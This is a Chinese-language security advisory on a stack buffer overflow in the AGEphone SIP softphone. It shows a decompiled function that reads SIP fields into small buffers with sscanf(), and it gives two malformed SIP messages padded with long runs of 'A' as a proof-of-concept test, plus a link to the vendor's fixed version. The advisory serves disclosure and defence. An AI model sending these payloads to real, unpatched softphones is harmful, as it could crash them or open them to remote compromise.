AGEphone SIP报文处理缓冲区溢出漏洞
发布日期:2006-07-25
更新日期:2006-07-26
受影响系统:Ageet AGEphone 1.38.1
Ageet AGEphone 1.28
不受影响系统:Ageet AGEphone 1.40
描述:
BUGTRAQ ID:
19148
AGEphone是基于国际SIP标准的电话软件。
AGEphone在处理通过SIP会话端口所接收的UDP SIP报文时使用了不安全的sscanf()函数,导致如果接收了特制的SIP报文就会触发栈溢出。
漏洞出现在sipd.dll的以下函数中:
function_100115D0(char *receivedSIPdata)
{
DWORD value;
char buffer1[20];
char buffer2[40];
if(receivedSIPdata != NULL)
{
// Skip leading SPACE and TAB characters
while(*receivedSIPdata != NULL)
{
if(*receivedSIPdata == 0x20 || *receivedSIPdata == 0x09)
receivedSIPdata++;
else
break;
}
if(strnicmp(receivedSIPdata, "SIP/", 4) == 0)
{
// BUFFER OVERFLOW when string read into buffer1 or buffer2 is overly long!!!
sscanf(receivedSIPdata, "%s %d %s\r\n", buffer1, value, buffer2);
return value;
}
else if(strnicmp(receivedSIPdata, "INVITE", 6) == 0)
{
...
}
else if(...) // Other else-if statements to determine the SIP command
{
}
}
}
<*来源:Tan Chew Keong (
chewkeong@security.org.sg)
链接:
http://vuln.sg/agephone1381-en.html
http://secunia.com/advisories/21175/print/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
SIP/AAAAAAAA[approx-68-bytes]AAAAAA 1 A
From: test
To: test
或者:
SIP/A 1 AAAAAAAA[approx-48-bytes]AAAAAA
From: test
To: test
建议:
厂商补丁:
Ageet
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.ageet.com/us/download.htm浏览次数:2872
严重程度:0(网友投票)
